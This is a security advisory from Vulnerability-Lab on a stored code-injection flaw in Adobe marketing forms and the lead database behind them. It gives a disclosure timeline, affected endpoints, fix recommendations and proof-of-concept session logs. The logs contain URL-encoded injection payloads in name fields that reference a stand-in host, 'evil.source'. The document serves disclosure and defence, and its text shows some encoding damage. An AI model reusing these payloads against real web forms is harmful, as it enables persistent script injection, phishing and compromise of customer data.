Adobe Systems Main lead DBMS Arbitrary Code Injection

`Document Title:  
===============  
Adobe Systems - Arbitrary Code Injection Vulnerability  
  
  
References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2120  
  
PSIRT ID: 7873  
  
Vulnerability Magazine:  
https://www.vulnerability-db.com/?q=articles/2018/07/19/hacker-injects-arbitrary-codes-main-lead-database-adobe-systems  
  
Acknowledgements: (Industry Partners)  
https://helpx.adobe.com/security/acknowledgements.html  
  
  
Release Date:  
=============  
2018-07-19  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
2120  
  
  
Common Vulnerability Scoring System:  
====================================  
6.4  
  
  
Vulnerability Class:  
====================  
Multiple  
  
  
Current Estimated Price:  
========================  
5.000a! - 10.000a!  
  
  
Product & Service Introduction:  
===============================  
Adobe Systems Incorporated commonly known as Adobe, is an American  
multinational computer software company.  
The company is headquartered in San Jose, California, United States.  
Adobe has historically focused upon the creation of  
multimedia and creativity software products, with a more recent foray  
towards rich Internet application software  
development. It is best known for Photoshop, an image editing software,  
Acrobat Reader, the Portable Document Format  
(PDF), and Adobe Creative Suite, as well as its successor, Adobe  
Creative Cloud.  
  
(COpy of the Homepage: https://en.wikipedia.org/wiki/Adobe_Systems )  
  
  
Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered arbitrary  
code execution vulnerability in the Adobe Systems main lead database  
management system.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2018-02-05: Researcher Notification & Coordination (Security Researcher)  
2018-02-08: Vendor Notification (Adobe PSIRT - Security Department)  
2018-02-12: Vendor Response/Feedback (Adobe PSIRT - Security Department)  
2018-02-16: Reporter Response/Feedback #1 (Security Researcher)  
2018-02-27: Reporter Response/Feedback #2 (Security Researcher)  
2018-03-04: Reporter Response/Feedback #3 (Security Researcher)  
2018-06-14: Vendor Fix/Patch (Adobe Service Developer Team)  
2018-06-15: Security Acknowledgements (Adobe PSIRT - Security Department)  
2018-06-19: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
Adobe Systems  
Product: Main Lead DBMS - *.adobesystems.com 2018 Q2  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
High  
  
  
Authentication Type:  
====================  
Pre auth - no privileges  
  
  
User Interaction:  
=================  
Low User Interaction  
  
  
Disclosure Type:  
================  
Responsible Disclosure Program  
  
  
Technical Details & Description:  
================================  
The vulnerability laboratory core research team discovered an arbitrary  
code injection vulnerability in the adobe systems main lead database  
management system.  
The issue allows remote attackers to inject own malicious script codes  
and system specific codes with persistent attack vector to the  
application-side of  
the vulnerable modules context or affected internal services.  
  
The arbitrary code injection vulnerability is located in the external  
services associated with the content of adobe systems subdomain services.  
Attackers are able to attack the adobe system's lead database by  
inserting arbitrary code over other database layers. This issue allows an  
attacker to perform the injection using an external service form. After  
the content has been delivered, the data is stored in the sub-service  
database management system. Over time, the database contents of the sub  
services are backed up and synchronized with the main database of the  
adobe systems. In the case of our research, we identified several  
external services to attack the sub-services of the adobe system and  
finally  
deliver the faulty content within the main lead database.  
  
The injection points are the external services. The exeuction points are  
located in the backend when processing to manage the contents and  
when the content is delivered through the main lead database to other  
customers or business clients (commercials, mailing and notify). The  
vulnerable domain that executed the contents are adobesystems.com and  
info.adobesystems.com. The request method to inject is POST and the  
attack vector is located on the application-sideof adobe-systems. To  
register and send an email no user account is required.  
  
Successful exploitation of the arbitrary code injection vulnerability  
results in malformed dbms injects, dbms compromise, session hijacking,  
persistent phishing attacks, persistent external redirects to malicious  
source and manipulation of affected or connected application modules.  
  
Vulnerable Micro Service(s):  
[+] apps.enterprise.adobe.com  
[+] offflivestream.creativecloud.adobeevents.com/  
[+] summit-emea.adobe.com  
  
Vulnerable Sub Service(s):  
[+] landing.adobe.com  
[+] offers.adobe.com  
[+]  
sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.5.0/s3118621512273  
  
  
Request Method(s):  
[+] POST  
  
Vulnerable File(s):  
[+] m.jsp  
[+] adobe_econsultancy_digital_trends_2017.html  
[+] submit.html  
[+] form.html  
  
Parameter(s):  
[+] firstname  
[+] lastname  
[+] companyname  
  
Affected Domain(s):  
[+] adobe.com  
[+] info.adobesystems.com  
[+] t.info.adobesystems.com  
[+] m.info.adobesystems.com  
[+] t-info.mail.adobe.com  
  
  
Proof of Concept (PoC):  
=======================  
The arbitrary code injection vulnerability can be exploited by remote  
attackers without privileged user account and with low user interaction.  
For security demonstration or to reproduce the vulnerability follow the  
provided information and steps below to continue.  
  
  
1. PoC: Injection Points External  
https://apps.enterprise.adobe.com/faas/service/3.0.0/submit  
https://offflivestream.creativecloud.adobeevents.com/register/registration/form  
https://summit-emea.adobe.com/emea/registration/?sdid=ZFN4FLWT&mv=email  
  
2. PoC: Followed Sub Systems  
http://landing.adobe.com/  
https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.html  
https://offers.adobe.com/de/de/marketing/offers/adobe_econsultancy_digital_trends_2017.html  
http://t-info.mail.adobe.com/r/?id=t3100ff18,90990a66,90990bea  
https://sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.5.0/s3118621512273  
  
  
3. PoC: Execution Points  
https://www.adobe.com/de/modal-offers/how-to-data-to-customer-intelligence.html  
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea733a  
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343&p1=%40HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D  
  
Note: The following example shows  
1. Enterprise to stats adobe  
2. After that occurs a sync to the sub domain service  
3. Then the data is merged to the info adobe service  
4. Some sync and backups later the content is inside the main lead database  
  
  
--- PoC Session Logs (POST Inject)---  
Status: 200[OK]  
GET  
https://apps.enterprise.adobe.com/faas/service/3.0.0/submit?callback=jQuery1102013829541567907688_1518951745795&id=1&l=3&d=%2Fcontent%2Fmicrosites%2Fadobe-offers%2Fde%2Fde%2Fmarketing%2Foffers%2Fadobe_econsultancy_digital_trends_2017.html&Form1%5B14%5D=822&Form1%5B15%5D=829&Form1%5B10%5D=a%22%3E%3C+src%3Devil.source%3E%3C%3E&Form1%5B33%5D=https%3A%2F%2Fwww.test.de%2F%22%3E%3Crc%3Devil.source%3E%3C%3E&Form1%5B95%5D=2746&Form1%5B8%5D=c%22%3E%3Csrc%3Devil.source%3E%3C%3E&Form1%5B9%5D=b%22%3E%3Csrc%3Devil.source%3E%3C%3E&Form1%5B1%5D=tester23%40evolutionsec.com&Form1%5B11%5D=01925723572723&Form1%5B16%5D=31337&Form1%5B18%5D=462&Form1%5B19%5D=2922&Form1%5B20%5D=72&Form1%5B130%5D=&Form1%5B35%5D=0&Form1%5B84%5D=0&Form1%5B84%5D=1&Form1%5B85%5D=0&Form1%5B85%5D=1&Form1%5B87%5D=0&Form1%5B87%5D=1&Form1%5B86%5D=0&Form1%5B77%5D=1&Form1%5B78%5D=1&Form1%5B79%5D=1&Form1%5B80%5D=&Form1%5B89%5D=&Form1%5B6%5D=marketing_web_form&Form1%5B7%5D=whitepaper_form&Form1%5B31%5D=EXPERIENCEMANAGERSOLN&Form1%5B36%5D=70114000002Cc8OAAS&Form1%5B37%5D=7011O000002Oq5lQAC&Form1%5B38%5D=&Form1%5B39%5D=&Form1%5B40%5D=&Form1%5B44%5D=&Form1%5B45%5D=&Form1%5B46%5D=&Form1%5B47%5D=&Form1%5B48%5D=&Form1%5B49%5D=&Form1%5B50%5D=&Form1%5B90%5D=DESBU&Form1%5B102%5D=&Form1%5B104%5D=&Form1%5B109%5D=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE&Form1%5B115%5D=&Form1%5B116%5D=&Form1%5B122%5D=&Form1%5B123%5D=&Form1%5B124%5D=&Form1%5B125%5D=&Form1%5B126%5D=&Form1%5B127%5D=&Form1%5B128%5D=&Form1%5B129%5D=&Form1%5B120%5D=&ajax=faas-form-1&_=1518951745799  
  
Mime Type[application/json]  
Request Header:  
Host[apps.enterprise.adobe.com]  
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)  
Gecko/20100101 Firefox/56.0]  
Accept[*/*]  
  
Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38&mv=search&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-management-system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]  
  
Cookie[AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1406116232%7CMCIDTS%7C17581%7CMCMID%7C70200303268859877472538284957896691642%7CMCAAMLH-1519556547%7C6%7CMCAAMB-1519556547%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1518958946s%7CNONE%7CMCAID%7C2D44AEA10530CAFD-40000305C000F505%7CMCSYNCSOP%7C411-17588%7CvVersion%7C2.5.0;  
s_pers=%20gpv%3Doffers.adobe.com%253Ade%253Amarketing%253Alandings%253Adigitale_trends_2017%7C1518953545956%3B%20s_nr%3D1518951745958-New%7C1550487745958%3B%20TID%3D-F4KHZX38-%7C1529319749183%3B%20s_vs%3D1%7C1518953726867%3B;  
s_sess=%20s_a_campaign%3DF4KHZX38%3B%20s_ppv%3D%255B%2522offers.adobe.com%252Fde%252Fde%252Fmarketing%252Flandings%252Fdigitale_trends_2017.html%2522%252C100%252C0%252C1118%252C1366%252C564%252C1366%252C768%252C1%252C%2522P%2522%255D%3B%20s_cpc%3D1%3B%20s_cc%3Dtrue%3B%20s_sq%3Dadbadobenonacdcprod%253D%252526c.%252526a.%252526activitymap.%252526page%25253Doffers.adobe.com%2525253Ade%2525253Amarketing%2525253Alandings%2525253Adigitale_trends_2017%252526link%25253Dd2d1d3d2A1d1F2d22j1-Abschicken%252526region%25253Dother%252526pageIDType%25253D1%252526.activitymap%252526.a%252526.c%2526adbadobefaasprod%25252Cadbadobeglobalapp%253D%252526c.%252526a.%252526activitymap.%252526page%25253Doffers.adobe.com%2525253Ade%2525253Ade%2525253Amarketing%2525253Alandings%2525253Adigitale_trends_2017.html%252526link%25253D1%252526region%25253Dfaas-form-1%252526pageIDType%25253D1%252526.activitymap%252526.a%252526.c%3B;  
AWSALB=SbTNAUwD4VWBfGie5pg1LBkQ7ycVDw3Fzp27qOKDkJWVXWlsMBWc+ZWO6kN7yUrqggRU8u1gRwmDINdgNj0ugIUmSdwvQN0J9S2u3LeTlwIni2swslD5rm7Jgw+R;  
PHPSESSID=ggu22jh4hpu53mpubl7udpmju3;  
AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; check=true;  
s_vi=[CS]v1|2D44AEA10530CAFD-40000305C000F505[CE];  
s_iid=70114000002Cc8OAAS; s_cid=7011O000002Oq5lQAC;  
mbox=session#e0102d4d21d34f458792072e649f04fb#1518953608|PC#e0102d4d21d34f458792072e649f04fb.26_15#1582196548;  
sfdc_session=-; TID=-F4KHZX38-; Fb-Syc=1; AAMC_adobe_0=REGION%7C6;  
s_sq=adbadobefaasprod%252Cadbadobeglobalapp%3D%2526c.%2526a.%2526activitymap.%2526page%253Doffers.adobe.com%25253Ade%25253Ade%25253Amarketing%25253Alandings%25253Adigitale_trends_2017.html%2526link%253DAbschicken%2526region%253Dfaas-form-1%2526pageIDType%253D1%2526.activitymap%2526.a%2526.c]  
Connection[keep-alive]  
Response Header:  
content-type[application/json; charset=UTF-8]  
content-length[445]  
server[Apache]  
expires[Thu, 19 Nov 1981 08:52:00 GMT]  
cache-control[no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0]  
pragma[no-cache]  
access-control-allow-origin[*]  
  
set-cookie[AWSALB=A3qFidf0O5y8FJMPYy8yPurGXw6U0pm1vsgi9RZbDaOZjkaQdp9cdZICl9KMU2yldLT8dDmkmf0oheGoizsb/x4D/1If/GfJZbDXNeZi0pkdbeLLupJo4azCKowa;  
  
Expires=Sun, 25 Feb 2018 11:05:26 GMT; Path=/  
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,  
20-Mar-2018 11:05:28 GMT; path=/; domain=adobe.com; secure  
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,  
20-Mar-2018 11:05:28 GMT; path=/; domain=offers.adobe.com; secure  
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,  
20-Mar-2018 11:05:28 GMT; path=/; domain=apps.enterprise.adobe.com; secure  
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;  
path=/; domain=adobe.com; secure  
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;  
path=/; domain=offers.adobe.com; secure  
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;  
path=/; domain=apps.enterprise.adobe.com; secure  
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;  
domain=adobe.com; secure  
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;  
domain=offers.adobe.com; secure  
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;  
domain=apps.enterprise.adobe.com; secure  
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;  
domain=adobe.com; secure  
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;  
domain=offers.adobe.com; secure  
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;  
domain=apps.enterprise.adobe.com; secure]  
X-Firefox-Spdy[h2]  
-  
Status: 200[OK]  
POST  
https://sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.5.0/s3118621512273  
  
Mime Type[image/gif]  
Request Header:  
Host[sstats.adobe.com]  
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)  
Gecko/20100101 Firefox/56.0]  
Accept[*/*]  
Accept-Language[de,en-US;q=0.7,en;q=0.3]  
Accept-Encoding[gzip, deflate, br]  
  
Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38  
&mv=search&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-management-system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]  
Content-Length[2181]  
Content-Type[text/plain;charset=UTF-8]  
Origin[https://offers.adobe.com]  
DNT[1]  
Connection[keep-alive]  
POST-Daten:  
AQB[1]  
ndh[1]  
pf[1]  
t[18%2F1%2F2018%2012%3A5%3A28%200%20-60]  
mid[70200303268859877472538284957896691642]  
aid[2D44AEA10530CAFD-40000305C000F505]  
aamlh[6]  
ce[UTF-8]  
cdp[2]  
fpCookieDomainPeriods[2]  
pageName[faaswc%3AFaaS%20Form%20Submission]  
  
g[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html%3Fgclid%3D  
EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D  
70114000002Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%213085%213%21250014124781%21]  
c.[]  
adb.[]  
app.[]  
name[1]  
namespace[faaswc]  
category[webComponent]  
version[3.0.0]  
.app[]  
state.[]  
  
location[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html  
%3Fgclid%3DEAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D  
70114000002Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%213085%213%21250014124781  
%21b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3As]  
.state[]  
.adb[]  
faaswc.[]  
form.[]  
id[1]  
.form[]  
.faaswc[]  
.c[]  
aamb[RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y]  
c36[unspecified]  
  
c37[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html%3Fgclid%3  
DEAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D70114000002Cc8O  
AAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%213085%213%21250014124781%21b%21%21g%21%21  
content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3As]  
c38[form_1]  
c39[linked_in%7Cjs%7Cfaas_submission%7Csfdc%7Cdemandbase]  
  
c42[%2Fcontent%2Fmicrosites%2Fadobe-offers%2Fde%2Fde%2Fmarketing%2Foffers  
%2Fadobe_econsultancy_digital_trends_2017.html%3Ffaas_unique_submission_id%3D78D1E035-F1C6-4261-4EA0-C82041EB2A11]  
a.[]  
activitymap.[]  
  
page[offers.adobe.com%3Ade%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017.html]  
link[Abschicken]  
region[faas-form-1]  
pageIDType[1]  
.activitymap[]  
.a[]  
s[1366x768]  
c[24]  
j[1.8.5]  
v[N]  
k[Y]  
bw[1366]  
bh[564]  
  
-g[b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3As]  
mcorgid[9E1005A551ED61CA0A490D45%40AdobeOrg]  
AQE[1]  
Response Header:  
Server[Omniture DC/2.0.0]  
Access-Control-Allow-Origin[*]  
X-C[ms-5.6.0]  
Expires[Sat, 17 Feb 2018 11:05:28 GMT]  
Last-Modified[Mon, 19 Feb 2018 11:05:28 GMT]  
Cache-Control[no-cache, no-store, max-age=0, no-transform, private]  
Pragma[no-cache]  
ETag["5A895DF8-FEF7-4E72B58E"]  
Vary[*]  
P3P[CP="This is not a P3P policy"]  
xserver[www56]  
Content-Length[43]  
Keep-Alive[timeout=15]  
Connection[Keep-Alive]  
Content-Type[image/gif]  
-  
Status: 200[OK]  
GET  
https://sstats.adobe.com/b/ss/adbadobenonacdcprod/10/JS-2.5.0-D7QN/s38633784893508?AQB=1&ndh=1&pf=1&callback=s_c_il[1].doPostbacks&et=1&t=18%2F1%2F2018%2012%3A5%3A28%200%20-60&cid.&email_hash.&id=ff01e8531641c6ec1bcec21c031b44eb&as=1&.email_hash&faas_unique_submission_id.&id=78D1E035-F1C6-4261-4EA0-C82041EB2A11&as=1&.faas_unique_submission_id&.cid&d.&nsid=0&jsonv=1&.d&D=D%3D&mid=70200303268859877472538284957896691642&aid=2D44AEA10530CAFD-40000305C000F505&aamlh=6&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=offers.adobe.com%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017&g=https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html%3Fgclid%3DEAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D70114000002Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%213085%213%21250014124781%21&events=event109&v28=offers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html&v69=offers.adobe.com%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017&v87=462&v88=72&v116=1&v147=78D1E035-F1C6-4261-4EA0-C82041EB2A11&v148=ff01e8531641c6ec1bcec21c031b44eb&pe=lnk_o&pev2=FaaS%20Form%20Submission&c.&a.&activitymap.&page=offers.adobe.com%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017&link=d2d1d3d2A1d1F2d22j1-Abschicken&region=other&pageIDType=1&.activitymap&.a&.c&-g=b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3As&mcorgid=9E1005A551ED61CA0A490D45%40AdobeOrg&AQE=1  
  
Mime Type[application/x-javascript]  
Request Header:  
Host[sstats.adobe.com]  
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)  
Gecko/20100101 Firefox/56.0]  
Accept[*/*]  
  
Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38&mv=search&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-management-system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]  
  
Cookie[AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1406116232%7CMCIDTS%7C17581%7CMCMID%7C70200303268859877472538284957896691642%7CMCAAMLH-1519556547%7C6%7CMCAAMB-1519556547%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1518958946s%7CNONE%7CMCAID%7C2D44AEA10530CAFD-40000305C000F505%7CMCSYNCSOP%7C411-17588%7CvVersion%7C2.5.0;  
s_pers=%20gpv%3Doffers.adobe.com%253Ade%253Amarketing%253Alandings%253Adigitale_trends_2017%7C1518953545956%3B%20s_nr%3D1518951745958-New%7C1550487745958%3B%20TID%3D-F4KHZX38-%7C1529319749183%3B%20s_vs%3D1%7C1518953728730%3B;  
s_sess=%20s_a_campaign%3DF4KHZX38%3B%20s_ppv%3D%255B%2522offers.adobe.com%252Fde%252Fde%252Fmarketing%252Flandings%252Fdigitale_trends_2017.html%2522%252C100%252C0%252C1118%252C1366%252C564%252C1366%252C768%252C1%252C%2522P%2522%255D%3B%20s_cpc%3D1%3B%20s_cc%3Dtrue%3B%20s_sq%3Dadbadobefaasprod%25252Cadbadobeglobalapp%253D%252526c.%252526a.%252526activitymap.%252526page%25253Doffers.adobe.com%2525253Ade%2525253Ade%2525253Amarketing%2525253Alandings%2525253Adigitale_trends_2017.html%252526link%25253D1%252526region%25253Dfaas-form-1%252526pageIDType%25253D1%252526.activitymap%252526.a%252526.c%3B;  
AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; check=true;  
s_vi=[CS]v1|2D44AEA10530CAFD-40000305C000F505[CE];  
s_iid=70114000002Cc8OAAS; s_cid=7011O000002Oq5lQAC;  
mbox=session#e0102d4d21d34f458792072e649f04fb#1518953608|PC#e0102d4d21d34f458792072e649f04fb.26_15#1582196548;  
sfdc_session=-; TID=-F4KHZX38-; Fb-Syc=1; AAMC_adobe_0=REGION%7C6;  
s_sq=%5B%5BB%5D%5D; faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb;  
faas_form_1_status=completed]  
Connection[keep-alive]  
Response Header:  
Server[Omniture DC/2.0.0]  
Access-Control-Allow-Origin[*]  
X-C[ms-5.6.0]  
ETag["5A895DF8-68DE-70672227"]  
Vary[*]  
P3P[CP="This is not a P3P policy"]  
xserver[www28]  
Content-Length[6393]  
Keep-Alive[timeout=15]  
Connection[Keep-Alive]  
Content-Type[application/x-javascript]  
  
  
  
Vulnerable Source: Service Email #1 (Test)  
<tbody><tr><td class="mobile-spacer" style="width:60px;"  
width="60">&nbsp;</td>  
<td class="headline" style="color:#2F303D; font-family:serenity,  
Helvetica Neue,  
Helvetica, Verdana, Arial, sans-serif; font-size:30px; line-height:25px;  
padding-top:40px;"  
align="center"><strong>RAGEN SIE HERAUS MIT GROSSARTIGEN  
ERLEBNISSEN.</strong></td>  
<td class="mobile-spacer" style="width:60px;" width="60">&nbsp;</td></tr>  
<tr><td class="mobile-spacer" style="width:60px;" width="60">&nbsp;</td>  
<td style="color:#2F303D; font-family:adobe-clean, Helvetica Neue Light,  
Helvetica Light,  
Helvetica, Verdana, Arial, sans-serif; font-size:16px; font-weight:100;  
line-height:19px; padding-top:12px;"  
align="center">Sehr geehrter Herr "<[PAYLOAD EXECUTION POINT FIRSTNAME &  
LASTNAME])" <,<br=""><br>das  
Erlebnis w&auml;chst sich gerade zum wichtigsten Faktor bei der  
Kundenbindung aus. Erlebnisse, die pers&ouml;nlich,  
begeisternd und konsistent auf jedem Kanal und Endger&auml;t sind AC/a!a  
das ist jetzt Ihr gr&ouml;AA,ter Wettbewerbsvorteil.  
<br><br>Besuchen Sie unseren Adobe Summit EMEA 2018. Erleben Sie bei  
uns, was es f&uuml;r auAA,ergew&ouml;hnliche  
digitale Erlebnisse wirklich braucht. Erfahren Sie von Unternehmen wie  
<strong>Sky, DHL</strong> oder  
<strong>Raiffeisen</strong>, wie sie diese neuartigen Erlebnis-Angebote  
realisiert haben, die ihre Gesch&auml;ftsmodelle  
heute bereits von der Konkurrenz abheben.  
  
  
Vulnerable Source: Service Email #2 (Test)  
<td class="mobile" style="display: none; max-height:0; font-size:0;  
height:0;padding:0;margin:0;width:0;" valign="top">  
<a  
href="http://t.info.adobesystems.com//r/?id=h545ac15,8dd8df42,8dd8df46&p1=7011O000002bSn9QAE&p2=0031400002mfNt5AAE"  
  
target="_blank" style="color:#0099ff;"><img class="mobile-image"  
alt="Weil wir innovativ bleiben, liegen wir weiterhin vorne."  
src="https://www.adobe.com/content/dam/acom/fr/solutions/digital-marketing/events/images/other/49460e.de.because-we-keep-innovating-we-keep-leading.640x597.jpg"  
  
style="vertical-align:top;  
overflow:hidden;display:none;visibility:hidden;width:0;max-height:0;"  
width="320" vspace="0" hspace="0" height="340" border="0">  
</a>  
</td>  
<!--<![endif]-->  
</tr>  
</tbody></table>  
</td>  
</tr>  
<tr>  
<td class="mobile-padding"  
style="padding-left:30px;padding-right:30px;padding-top:14px;"  
valign="top" bgcolor="#000000">  
<table style="mso-cellspacing: 0px; mso-padding-alt: 0px 0px 0px 0px;  
width:100%;" width="100%" cellspacing="0" cellpadding="0" border="0">  
<tbody><tr>  
<td class="mobile-text" style="color:#ffffff; font-family:Arial,  
Helvetica, sans-serif; font-size:12px; line-height:18px;  
padding-top:12px;" valign="top">  
Sehr geehrter Herr "%20"[PAYLOAD EXECUTION POINT FIRSTNAME &  
LASTNAME],<br=""><br>Forrester stuft Adobe als Leader bei Web-Analysen ein.  
Lesen Sie in <i>The Forrester Wave<sup  
style="line-height:95%;">AC/aAC/</sup>: Web Analytics, Q4 2017</i>, weshalb  
wir weiter den Ton angeben  
AC/a!a mit aussagekrAA$?ftigen und verwertbaren Einblicken fAA1/4r alle  
Mitarbeiter im Unternehmen.  
</tr>  
  
  
Reference(s):  
https://www.adobe.com  
http://t.info.adobesystems.com  
http://m.info.adobesystems.com  
https://offers.adobe.com  
https://sstats.adobe.com  
https://apps.enterprise.adobe.com  
http://landing.adobe.com  
http://t-info.mail.adobe.com  
https://offflivestream.creativecloud.adobeevents.com  
https://summit-emea.adobe.com  
  
  
Solution - Fix & Patch:  
=======================  
1. Restrict and filter the input fields and disallow usage of script  
code tags for inputs  
2. Encode the context of the input fields during the post method request  
submit to prevent malformed injects  
3. Parse the firstname and lastname and company values in outgoing  
emails with all adobe service templates  
4. Implement a filter mechanism with exception-handling to parse  
contents delivered from an external service to the sub-service followed  
by the main lead database  
5. Provide awareness to employees by explaining the specific impact of  
the attack points to prevent the manual delivery  
6. Develop a process to remove compromised information from the main  
database or backups  
7. Ensure that a web-firewall captures those incidents to alert or react  
to ensure that an attacker is not able to move through the separate  
database segments  
  
The reported urls has been reported and disarmed already by the adobe  
systems psirt and developer team. The issue has been patched in multiple  
functions.  
The forumulars are already restricted and the case scenario has been  
full transparent delivered to ensure the problematic becomes visible to  
adobe.  
(Example:  
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343&p1=%40HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D)  
  
  
Security Risk:  
==============  
The security risk of the arbitrary code injection vulnerability in the  
adobe web services are estimated as high.  
  
  
Credits & Authors:  
==================  
Benjamin K.M. (Vulnerability Laboratory Core Research  
Team)[[email protected]] -  
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without  
any warranty. Vulnerability Lab disclaims all warranties, either  
expressed or  
implied, including the warranties of merchantability and capability for  
a particular purpose. Vulnerability-Lab or its suppliers are not liable  
in any  
case of damage, including direct, indirect, incidental, consequential  
loss of business profits or special damages, even if Vulnerability Labs  
or its  
suppliers have been advised of the possibility of such damages. Some  
states do not allow the exclusion or limitation of liability mainly for  
incidental  
or consequential damages so the foregoing limitation may not apply. We  
do not approve or encourage anybody to break any licenses, policies, deface  
websites, hack into databases or trade with stolen data. We have no need  
for criminal activities or membership requests. We do not publish  
advisories  
or vulnerabilities of religious-, militant- and racist-  
hacker/analyst/researcher groups or individuals. We do not publish trade  
researcher mails,  
phone numbers, conversations or anything else to journalists,  
investigative authorities or private individuals.  
  
